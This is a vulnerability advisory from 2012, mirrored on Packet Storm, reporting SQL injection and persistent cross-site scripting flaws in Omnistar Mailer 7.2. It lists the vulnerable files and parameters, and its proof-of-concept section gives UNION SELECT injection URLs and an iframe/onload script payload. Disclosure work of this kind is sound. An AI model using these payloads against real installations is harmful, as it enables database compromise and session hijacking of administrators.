exploit the possibilities

Omnistar Mailer 7.2 SQL Injection / Cross Site Scripting

Omnistar Mailer 7.2 SQL Injection / Cross Site Scripting
Posted Oct 3, 2012
Authored by Ibrahim El-Sayed | Site vulnerability-lab.com

Omnistar Mailer version 7.2 suffers from remote SQL injection and cross site scripting vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 8204139b449aac5527cfa3a50d3e393d

Omnistar Mailer 7.2 SQL Injection / Cross Site Scripting

Change Mirror Download
Title:
======
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities


Date:
=====
2012-10-01


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=711


VL-ID:
=====
711


Common Vulnerability Scoring System:
====================================
8.5


Introduction:
=============
The Omnistar Mailer software was developed because of the need that was found in the industry to easily manage
email marketing campaigns without having much technical experience. After reviewing feedback from various users
that had used email mailing list managers, it was determined that many of the current solutions that are on the
market are cumbersome and overly complex. Most users of email marketing solutions desire a simple solution were
they can easily add email list campaigns and track the success of them. There of course are many other features
that add value to the products, however the main function is to send out mass emails, manage the opt-in /
opt-out process. After reviewing the feedback of these users and studying the current solutions on the market,
we developed what we call Omnistar Mailer. We feel our product combines simplicity with a robust set of features
and functions that should meet the needs of most users.

The Omnistar Mailer software is one of the flag ship solutions from Omnistar Interactive. Our entire goal when
developing any of our solutions has been to make it so easy to use, that any non-technical person can successfully
use the software. Everyday we strive to make more and more improvements to the software so that it becomes better
and better. To make this goal a reality, we actively solicit feedback from our customers so that we stay on the
pulse of their needs. It is only through this interactive dialogue that we can implement those features that make
sense to our customers. It is our customers that drive our development process and make sure that our software has
the most desired components and features.

(Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software.


Report-Timeline:
================
2012-10-01: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Omnistar Interactive
Product: Omnistar Mailer v7.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 Email Marketing Software.
The vulnerabilities allow an attacker (remote) or local low privileged user account to execute a SQL commands on the
affected application dbms. The vulnerabilities are located in the responder, preview, pages, navlinks, contacts,
register and index modules with the bound vulnerable id & form_id parameters. Successful exploitation of the vulnerability
results in dbms & application compromise. Exploitation requires no user inter action & without privileged user account.


Vulnerable Module(s):
[+] /admin/responder
[+] /admin/preview
[+] /admin/navlinks
[+] /admin/pages
[+] /admin/contacts
[+] /users/index
[+] /users/register

Vulnerable File(s):
[+] /admin/responder.php
[+] /admin/preview.php
[+] /admin/pages.php
[+] /admin/navlinks.php
[+] /admin/contacts.php
[+] /user/register.php
[+] /users/index.php

Vulnerable Parameter(s):
[+] ?op=edit&id=
[+] ?id=
[+] ?form_id=
[+] ?op=edit&nav_id=
[+] ?op=edit&id=16&form_id=
[+] ?op=edit&id=3&form_id=

[+] ?nav_id=
[+] ?profile=1&form_id=
[+] ?form_id=


1.2
A persistent input validation vulnerability is detected in the Omnistar Mailer v7.2 Email Marketing Software.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The persistent vulnerability is located in the Create Website Forms module with the bound vulnerable form name parameters.
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action & privileged user account.

Vulnerable Section(s):
[+] Customise Interface -> Create Website Forms

Vulnerable Module(s):
[+] Create Standard Registration Form -> Add form

Vulnerable Parameter(s):
[+] Form Name


Proof of Concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#

http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3)
in (
select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
from mailer75_navlinks
where nav_id='9''
)



1.2
The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action & low
privileged user account. For demonstration or reproduce ...

The attacker create a form and insert in "form name" field own malicious javascript or html code.
To create the form the attacker should to go to
Customise Interface -> Create Website Forms -> Create Standard Registration Form -> Add form
Then inject the malicious script code i.e., <iframe src=www.vuln-lab.com onload=alert("VL")/>
When the user browses the forms page in the control panel, or any user trying to register for the website,
the persistent injected script code will be executed out of the web application context.


Risk:
=====
1.1
The security risk of the blind SQL injection vulnerability is estimated as critical.

1.2
The security risk of the persistent input validation vulnerability is estimated as medium(+).



Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [storm@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory



--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close